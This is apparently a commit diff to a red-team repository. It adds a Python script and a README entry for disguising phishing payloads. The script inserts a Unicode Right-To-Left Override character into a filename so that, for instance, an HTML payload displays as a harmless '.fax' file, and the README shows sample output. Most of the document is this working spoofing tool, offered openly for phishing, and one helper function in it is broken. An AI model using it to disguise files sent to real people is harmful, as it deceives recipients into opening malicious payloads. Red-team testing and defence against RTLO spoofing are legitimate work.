Added DancingRightToLeft.py script.

phishing/DancingRightToLeft.py

@@ -0,0 +1,112 @@
+#!/usr/bin/python3
+#
+# A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
+#
+# Sources:
+#   - http://unicode.org/reports/tr36/#Bidirectional_Text_Spoofing
+#   - https://www.mozilla.org/en-US/security/advisories/mfsa2009-62/
+#   - https://krebsonsecurity.com/2011/09/right-to-left-override-aids-email-attacks/
+#   - https://twitter.com/ffforward/status/1486743442801704974
+#
+# Mariusz Banach, mgeeky, "22
+# <mb [at] binary-offensive.com>
+#
+
+import os, sys
+import shutil
+import string
+import argparse
+
+RTLO = '\u202E'      # Right-To-Left Override
+
+def rightToLeftOverride(phrase):
+
+    for i in range(len(phrase)-1)[::-1]:
+        if options['simulate']:
+            cand = phrase[:i] + phrase[i:][::-1]
+        else:
+            cand = phrase[:i] + Constants['RTLO'] + phrase[i:]
+
+def opts(argv):
+    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <filename> <decoy-extension>')
+    parser.add_argument('filename', help='Payload file that we wish to rename.')
+    parser.add_argument('decoy_extension', help='Extension that we wish our payload to mimic via RTLO')
+    parser.add_argument('-p', '--padding', default=' ', help='If current file extension length is different than decoy extension length, pad filename with this character. Default: space.')
+
+    args = parser.parse_args()
+
+    args.filename = os.path.abspath(args.filename)
+
+    if args.decoy_extension.startswith('.'): 
+        args.decoy_extension = args.decoy_extension[1:]
+
+    if '.' not in args.filename:
+        print('[!] Input filename does not have extension! You must point this script to the existing file having some original extension.')
+        sys.exit(1)
+
+    return args
+
+def main(argv):
+    print('''
+    :: Dancing Right-To-Left
+    
+    A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
+
+    Mariusz Banach / mgeeky '22, (@mariuszbit)
+    <mb@binary-offensive.com>
+''')
+
+    args = opts(argv)
+    if not args:
+        return False
+
+    filename, ext = os.path.splitext(args.filename)
+    filename2 = os.path.basename(filename)
+    ext = ext.replace('.', '')
+
+    if len(ext) == 0:
+        print('[!] Input filename does not have extension! You must point this script to the existing file having some original extension.')
+        sys.exit(1)
+
+    targetext = args.decoy_extension[::-1]
+    q = ''
+
+    if len(targetext) < len(ext):
+        filename2 += (len(ext) - len(targetext)) * args.padding
+        q = '"'
+
+    elif len(targetext) > len(ext):
+        filename2 += (len(targetext) - len(ext)) * args.padding
+        q = '"'
+
+    out1 = filename2 + '\\u202e' + targetext + '.' + ext
+    rest = targetext + '.' + ext
+    out2 = filename2 + rest[::-1]
+    out3 = filename2 + RTLO + targetext + '.' + ext
+
+    print(f'''INPUT:
+
+    Payload Filename                                 :  {os.path.basename(args.filename)}
+    Payload Extension                                :  {q}.{ext}{q}
+    Decoy payloads' extension as                     :  {q}.{args.decoy_extension}{q}
+
+OUTPUT:
+
+    Your file was named in following way             :  {q}{out1}{q}
+
+    Your filename will look like this (simulated)    :  {q}{out2}{q}
+    Your filename will look like this (real display) :  {out3}
+''')
+
+    old = args.filename
+    new = os.path.dirname(old) + os.sep + filename2 + RTLO + targetext + '.' + ext
+    
+    #
+    # Using manual bytes copy cause I was having some weird issues with shutil.copy()
+    # 
+    with open(old, 'rb') as oldfile:
+        with open(new, 'wb') as newfile:
+            newfile.write(oldfile.read())
+
+if __name__ == '__main__':
+    main(sys.argv)

phishing/README.md

@@ -1,6 +1,32 @@
 ## Phishing and Social-Engineering related scripts, tools and CheatSheets
 
 
+- **`DancingRightToLeft.py`** - A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
+
+```
+PS> py DancingRightToLeft.py 502.html fax
+
+    :: Dancing Right-To-Left
+
+    A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
+
+    Mariusz Banach / mgeeky '22, (@mariuszbit)
+    <mb@binary-offensive.com>
+
+INPUT:
+
+    Payload Filename                                 :  502.html
+    Payload Extension                                :  ".html"
+    Decoy payloads' extension as                     :  ".fax"
+
+OUTPUT:
+
+    Your file was named in following way             :  "502 \u202exaf.html"
+
+    Your filename will look like this (simulated)    :  "502 lmth.fax"
+    Your filename will look like this (real display) :  502 ‮xaf
+```
+
 - [**`decode-spam-headers.py`**](https://github.com/mgeeky/decode-spam-headers) - This tool accepts on input an `*.EML` or `*.txt` file with all the SMTP headers. It will then extract a subset of interesting headers and using **79+** tests will attempt to decode them as much as possible.
 
   This script also extracts all IPv4 addresses and domain names and performs full DNS resolution of them.